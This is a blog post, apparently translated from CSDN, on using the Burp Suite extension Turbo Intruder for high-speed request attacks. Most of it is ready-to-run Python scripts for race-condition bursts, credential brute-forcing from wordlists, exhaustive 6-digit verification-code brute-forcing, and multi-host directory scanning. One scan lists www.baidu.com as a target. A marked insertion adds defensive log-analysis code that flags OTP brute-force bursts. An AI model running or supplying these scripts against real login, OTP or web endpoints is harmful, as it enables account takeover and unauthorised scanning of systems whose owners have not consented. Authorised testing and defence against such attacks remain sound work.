Burp bug-hunting plugins: notes
Using Turbo Intruder: embracing the billion-request attack
Turbo Intruder overview
Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analysing the results. It is designed to make up for the shortcomings of Intruder. Its features are:
Fast: Turbo Intruder uses a rewritten HTTP stack built for speed. On many targets it can even outpace popular asynchronous Go scripts.
Scalable: Turbo Intruder uses very little memory at runtime, so it can run continuously for days. It can also be used from the command line, independent of Burp Suite.
Flexible: Turbo Intruder attacks are configured in Python, which lets it handle complex requirements such as signed requests and multi-step attack sequences. The custom HTTP stack also means it can handle malformed requests that other libraries cannot.
Convenient: its results can be filtered automatically by Backslash Powered Scanner's advanced diffing algorithm, so you can launch an attack and get useful results with two clicks.
How fast is it?
What does this speed mean in practice? Take brute-forcing a 6-digit verification code: 1,000,000 requests at 20,000 requests per second take only 50 seconds. Even if your code is valid for just one minute, it can still be brute-forced. So do not assume that a 6-digit code is secure enough!
Of course, the speed above is close to the limit; it presumably reflects running Burp Suite with the bandwidth of a cloud VPS.
A home network usually cannot reach that speed, but several hundred requests per second is still easy. At 1,000 requests per second, the 1,000,000 requests for a 6-digit code take only 1,000 seconds, about 16 minutes, to crack.
How Turbo Intruder works under the hood
Turbo Intruder uses a custom HTTP stack to talk to the server.
First, it sends HTTP requests with a Connection: keep-alive header. With the default Connection: close header, every HTTP request to the server needs a fresh TCP connection, which wastes time.
The Connection: keep-alive header lets multiple HTTP requests reuse a single TCP connection, saving the cost of repeatedly setting up TCP connections. As the figure shows, with Connection: keep-alive the speed is 400% of the original.
It also uses HTTP pipelining to send requests: dozens of HTTP requests are sent to the server in one go, and then dozens of responses are read back in one go. With pipelining, the speed is 6000% of the starting point!
Usage
Raising the pipeline count further to 10 pushed the speed up to 2634, but Retries reached 41, meaning more requests had to be resent and the network had become unstable. For this target we therefore settled on concurrentConnections=5, requestsPerConnection=100, pipeline=True as the best parameters.
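The arithmetic from the two sections above, seen from the defender's side, as an added example that is not part of the original post: how long a fixed rate needs to exhaust a numeric code space, what a lockout after a few failures does to the attacker's odds, and how a keep-alive/pipelined burst of failed attempts stands out in an access log. It assumes a hypothetical OTP endpoint `/verify?user=...` and nginx-style log lines, both constructed here.

```python
import re
from collections import defaultdict
from datetime import datetime

# nginx-style access log fields; /verify?user=... is a hypothetical OTP endpoint
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "POST (?P<path>\S+)[^"]*" (?P<status>\d{3})')
USER_RE = re.compile(r'^/verify\?user=(?P<user>[^&]+)')

def seconds_to_exhaust(digits, requests_per_second):
    """Worst-case time to try every numeric code of the given length at a fixed rate."""
    return 10 ** digits / float(requests_per_second)

def max_success_probability(digits, attempts_allowed):
    """Chance of guessing a code when the server locks out after attempts_allowed failures."""
    return attempts_allowed / float(10 ** digits)

def parse_failed_attempts(log_lines):
    """Yield (ip, user, datetime) for every failed (non-200) POST to the OTP endpoint."""
    for line in log_lines:
        m = LOG_RE.match(line)
        u = USER_RE.match(m.group('path')) if m else None
        if u and m.group('status') != '200':
            ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
            yield m.group('ip'), u.group('user'), ts

def flag_otp_bursts(log_lines, window_seconds=60, max_attempts=5):
    """Return {(ip, user): peak} for pairs with more than max_attempts failures in any window."""
    per_key = defaultdict(list)
    for ip, user, ts in parse_failed_attempts(log_lines):
        per_key[(ip, user)].append(ts)
    flagged = {}
    for key, stamps in per_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):  # sliding window over sorted timestamps
            while (t - stamps[start]).total_seconds() >= window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > max_attempts:
            flagged[key] = peak
    return flagged

# Constructed sample log (RFC 5737 test addresses): one client fires 30 pipelined
# attempts at alice's code within a second; another fails twice at bob's, minutes apart.
SAMPLE_LOG = ['203.0.113.7 - - [01/Mar/2021:10:00:00 +0000] "POST /verify?user=alice HTTP/1.1" 403 41'] * 30 + [
    '198.51.100.5 - - [01/Mar/2021:10:00:00 +0000] "POST /verify?user=bob HTTP/1.1" 403 41',
    '198.51.100.5 - - [01/Mar/2021:10:03:00 +0000] "POST /verify?user=bob HTTP/1.1" 403 41',
]
```

At the rates quoted above, `seconds_to_exhaust(6, 20000)` is 50 s and `seconds_to_exhaust(6, 1000)` is 1000 s, while a lockout after 5 failures caps the attacker at a 0.0005% chance per code, which is why per-account attempt limits matter more than code length alone.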


Applications
1. Testing for race conditions
race.py
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)
2. Brute-forcing usernames and passwords
default.py
This uses the same script as directory scanning.
from urllib import quote

def password_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/mypass.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/myuser.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_password_brute(target, engine):
    # two insertion points in the request: username first, then password
    for password in open('/Users/mac/safe/web/brute/passwordtop100.txt'):
        for user in open('/Users/mac/safe/web/brute/usertop100.txt'):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    #user_brute(target, engine)
    #password_brute(target, engine)
    user_password_brute(target, engine)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status == 302:
        table.add(req)
3. Brute-forcing verification codes
from itertools import product

def brute_verify_code(target, engine, length):
    # every numeric code of the given length, in order
    pattern = '1234567890'
    for i in product(pattern, repeat=length):
        code = ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    brute_verify_code(target, engine, 6)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'error' not in req.response:
        table.add(req)
4. Directory scanning against multiple targets
def mult_host_dir_brute():
    # request template with two insertion points: the path and the Host header;
    # the trailing blank line terminates the header block
    req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive

'''
    engines = {}
    for url in open('/Users/mac/temp/urls.txt'):
        url = url.rstrip()
        engine = RequestEngine(endpoint=url,
                               concurrentConnections=5,
                               requestsPerConnection=100,
                               pipeline=True)
        engines[url] = engine
    for word in open('/Users/mac/safe/web/brute/all.txt'):
        word = word.rstrip()
        for (url, engine) in engines.items():
            domain = url.split('/')[2]
            engine.queue(req, [word, domain])

def queueRequests(target, wordlists):
    mult_host_dir_brute()

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)
Here urls.txt holds the URLs of two home pages:
https://www.baidu.com
http://172.16.108.176
The req template in the code (line 9 of the original listing) has two insertion points, %s: one for the path and one for the Host header. The loop over urls.txt (lines 8 to 14) then creates a separate request engine for each URL, with each engine responsible for scanning one URL, and the loop over the wordlist (lines 16 to 20) queues the dictionary entries for scanning.
You can then open the Turbo Intruder window from any request, paste in the code above, put the URLs to scan into urls.txt, and start scanning.
Note: replace the paths to urls.txt (line 8) and the directory wordlist (line 16) with your own.


5. Complete code
from urllib import quote
from itertools import product

def concurrency(target, engine):
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, gate='race1')
    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')
    engine.complete(timeout=60)

def parameter_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/AllParam.txt'):
        engine.queue(target.req, word.rstrip())

def dir_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/dir_scan/all_dir.txt'):
    #for word in open('/Users/mac/safe/web/brute/all.txt'):
        engine.queue(target.req, word.rstrip())

def mult_host_dir_brute():
    # request template with two insertion points: the path and the Host header;
    # the trailing blank line terminates the header block
    req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive

'''
    engines = {}
    for url in open('/Users/mac/temp/urls.txt'):
        url = url.rstrip()
        engine = RequestEngine(endpoint=url,
                               concurrentConnections=5,
                               requestsPerConnection=100,
                               pipeline=True)
        engines[url] = engine
    for word in open('/Users/mac/safe/web/brute/all.txt'):
        word = word.rstrip()
        for (url, engine) in engines.items():
            domain = url.split('/')[2]
            engine.queue(req, [word, domain])

def password_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/mypass.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/myuser.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_password_brute(target, engine):
    # two insertion points in the request: username first, then password
    for password in open('/Users/mac/safe/web/brute/passwordtop100.txt'):
        for user in open('/Users/mac/safe/web/brute/usertop100.txt'):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])

def brute_verify_code(target, engine, length):
    # pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
    pattern = '1234567890'
    for i in product(pattern, repeat=length):
        code = ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    #brute_verify_code(target, engine, 5)
    dir_brute(target, engine)
    #user_brute(target, engine)
    #concurrency(target, engine)
    #password_brute(target, engine)
    #user_password_brute(target, engine)
    #mult_host_dir_brute()

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404 and req.status != 302:
    #if req.wordcount != 1197 and req.wordcount != 1196:
    #if 'success' in req.response:
    #if req.length == 461:
    #if interesting:
        table.add(req)
Copyright notice: this article is an original work by CSDN blogger "TimeShatter", licensed under CC 4.0 BY-SA. When reposting, include a link to the original source and this notice.
Original link: https://blog.csdn.net/qq_28205153/article/details/113832488